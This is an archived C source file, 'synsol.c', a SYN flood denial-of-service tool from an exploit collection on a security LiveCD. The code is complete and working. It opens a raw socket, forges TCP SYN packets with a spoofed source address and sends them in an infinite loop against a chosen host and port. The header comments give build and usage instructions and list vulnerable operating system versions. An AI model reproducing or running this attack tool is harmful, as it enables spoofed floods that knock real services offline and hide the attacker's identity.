home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / remote / synsol.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  6KB  |  199 lines

  1. /* Syn Attack against a port for Solaris               [2000]*/
  2. /* Original land attack, land.c by m3lt, FLC           [2000]*/
  3. /* Ported to 44BSD by blast and jerm                   [2000]*/
  4. /* Ported to Solaris by ziro antagonist                [2000]*/
  5. /* Referenced flood.c by unknown author                [2000]*/
  6. /* Converted into a syn attack against one port by CRG [2000]*/
  7. /* Please use this for educational purposes only       [2000]*/
  8. /* Compiles on Solaris gcc -o synsol synsol.c -lsocket -lnsl */
  9. /* Additional notes:                                   [2000]*/
  10. /* Successfully compiled on Solaris 2.51 and 2.6       [2000]*/
  11. /* Runs: synsol <dstIP> <dstPort> <spoofedsrcIP>       [2000]*/
  12. /*                                                     [2000]*/
  13. /* Tested it on: Solaris 2.6                           [2000]*/
  14. /*                                                     [2000]*/
  15. /* Attacked against:                                   [2000]*/
  16. /*        Linux 2.0.33    - vulnerable                 [2000]*/
  17. /*        Linux 2.0.30    - vulnerable                 [2000]*/
  18. /*        Linux 1.2.13    - vulnerable                 [2000]*/
  19. /*        Solaris 2.4     - vulnerable                 [2000]*/
  20. /*        Solaris 2.5.1   - vulnerable                 [2000]*/
  21. /*        SunOS 4.1.3_U3  - vulnerable                 [2000]*/
  22. /*        Solaris 2.6     - not vulnerable             [2000]*/
  23. /*                                                     [2000]*/
  24. /* Most of these test machines are not patched because they  */
  25. /* are in test lab. I tested the program against port 23 and */
  26. /* every once in awhile I did get through.             [2000]*/
  27. /*                                                     [2000]*/
  28. /* Direct any comments, questions, improvements to     [2000]*/
  29. /* packetstorm@genocide2600.com                        [2000]*/
  30. /* http://www.genocide2600.com/~tattooman/             [2000]*/
  31. /* Your emails will be forwarded to the author, who wishes   */
  32. /* to remain known only as CRG (no email addy or URL)  [2000]*/
  33.  
  34. #include <signal.h>
  35. #include <stdio.h>
  36. #include <stdlib.h>
  37. #include <netdb.h>
  38. #include <sys/socket.h>
  39. #include <sys/types.h>
  40. #include <netinet/in.h>
  41. #include <netinet/in_systm.h>
  42. #include <netinet/ip.h>
  43. #include <netinet/tcp.h>
  44. #include <netinet/ip_icmp.h>
  45. #include <ctype.h>
  46. #include <arpa/inet.h>
  47. #include <unistd.h>
  48. #include <string.h>
  49. #include <errno.h>
  50.  
  51. unsigned long srcport;
  52.  
  53.  
  54. struct pseudohdr
  55.   {
  56.     struct in_addr saddr;
  57.     struct in_addr daddr;
  58.     u_char zero;
  59.     u_char protocol;
  60.     u_short length;
  61.     struct tcphdr tcpheader;
  62.   };
  63.  
  64. u_short checksum(u_short * data,u_short length)
  65. {
  66.   int nleft = length;
  67.   int sum=0;
  68.   unsigned short *w = data;
  69.   unsigned short value = 0;
  70.  
  71.   while (nleft > 1)
  72.     {
  73.       sum += *w++;
  74.       nleft -= 2;
  75.     }
  76.  
  77.   if (nleft == 1)
  78.     {
  79.       *(unsigned char *) (&value) = *(unsigned char *) w;
  80.       sum += value;
  81.     }
  82.   sum = (sum >>16) + (sum & 0xffff);
  83.   sum += (sum >> 16);
  84.   value = ~sum;
  85.   return(value);
  86. }
  87.  
  88.  
  89. int main(int argc,char * * argv)
  90. {
  91.   struct sockaddr_in sin;
  92.   struct sockaddr_in din;
  93.   struct hostent * hoste;
  94.   struct hostent * host1;
  95.   int j,sock,foo, flooddot=1;
  96.   char buffer[40];
  97.   struct ip * ipheader=(struct ip *) buffer;
  98.   struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip));
  99.   struct pseudohdr pseudoheader;
  100.  
  101.   fprintf(stderr,"Syn attack against one port.(Infinite)\n");
  102.  
  103.   if(argc<4)
  104.     {
  105.       fprintf(stderr,"usage: %s <dstIP> <dstport> <spoofed-srcIP>\n",argv[0]);
  106.       return(-1);
  107.     }
  108.  
  109.   fprintf(stderr,"%s:%s is being syn'd attacked by %s.\n",argv[1],argv[2],argv[3]);
  110.   bzero(&sin,sizeof(struct sockaddr_in)); /*write sizeof to &sin*/
  111.   sin.sin_family=AF_INET;
  112.  
  113.   if((host1=gethostbyname(argv[3]))!=NULL)
  114.     bcopy(host1->h_addr,&din.sin_addr,host1->h_length);
  115.   else if((din.sin_addr.s_addr=inet_addr(argv[3]))==-1)
  116.     {
  117.       fprintf(stderr,"unknown source host %s\n",argv[3]);
  118.       return(-1);
  119.     }
  120.   if((hoste=gethostbyname(argv[1]))!=NULL)
  121.     bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
  122.   else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
  123.     {
  124.       fprintf(stderr,"unknown destination host %s\n",argv[1]);
  125.       return(-1);
  126.     }
  127.  
  128.   if((sin.sin_port=htons(atoi(argv[2])))==0)
  129.     {
  130.       fprintf(stderr,"unknown port %s\n",argv[2]);
  131.       return(-1);
  132.     }
  133.  
  134.  
  135.   if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
  136.     {
  137.       fprintf(stderr,"couldn't allocate raw socket\n");
  138.       return(-1);
  139.     }
  140.  
  141.   foo=1;
  142.   if(setsockopt(sock,0,IP_HDRINCL,(char *)&foo,sizeof(int))==-1)
  143.     {
  144.       fprintf(stderr,"couldn't set raw header on socket\n");
  145.       return(-1);
  146.     }
  147.   for(j=1;j>0;j++)
  148.     {
  149.       bzero(&buffer,sizeof(struct ip)+sizeof(struct tcphdr));
  150.  
  151.       ipheader->ip_v=4;
  152.       ipheader->ip_tos=0;
  153.       ipheader->ip_hl=sizeof(struct ip)/4;
  154.       ipheader->ip_len=sizeof(struct ip)+sizeof(struct tcphdr);
  155.       ipheader->ip_id=htons(random());
  156.       ipheader->ip_ttl=30; /*255;*/
  157.       ipheader->ip_p=IPPROTO_TCP;
  158.       ipheader->ip_sum=0;
  159.       ipheader->ip_src=din.sin_addr;
  160.       ipheader->ip_dst=sin.sin_addr;
  161.  
  162.       tcpheader->th_sport=htons(srcport); /*sin.sin_port;*/
  163.       tcpheader->th_dport=sin.sin_port;
  164.       tcpheader->th_seq=htonl(0x28374839);
  165.       tcpheader->th_flags=TH_SYN;
  166.       tcpheader->th_off=sizeof(struct tcphdr)/4;
  167.       tcpheader->th_win=htons(2048);
  168.       tcpheader->th_sum=0;
  169.  
  170.       bzero(&pseudoheader,12+sizeof(struct tcphdr));
  171.       pseudoheader.saddr.s_addr=din.sin_addr.s_addr;
  172.       pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
  173.       pseudoheader.protocol=6;
  174.       pseudoheader.length=htons(sizeof(struct tcphdr));
  175.       bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
  176.       tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
  177.  
  178.       srcport= (10000.0*random()/(15000+1.0));
  179.       if(sendto(sock,buffer,sizeof(struct ip)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1)
  180.  
  181.         {
  182.           fprintf(stderr,"couldn't send packet,%d\n",errno);
  183.           return(-1);
  184.         }
  185.  
  186.       usleep(2);
  187.  
  188.       if (!(flooddot = (flooddot+1)%(1)))
  189.         {
  190.           fprintf(stdout,".");
  191.           fflush(stdout);
  192.         }
  193.  
  194.  
  195.     }  /*The end of the infinite loop*/
  196.   close(sock);
  197.   return(0);
  198. }
  199. /*                    www.hack.co.za              [2000]*/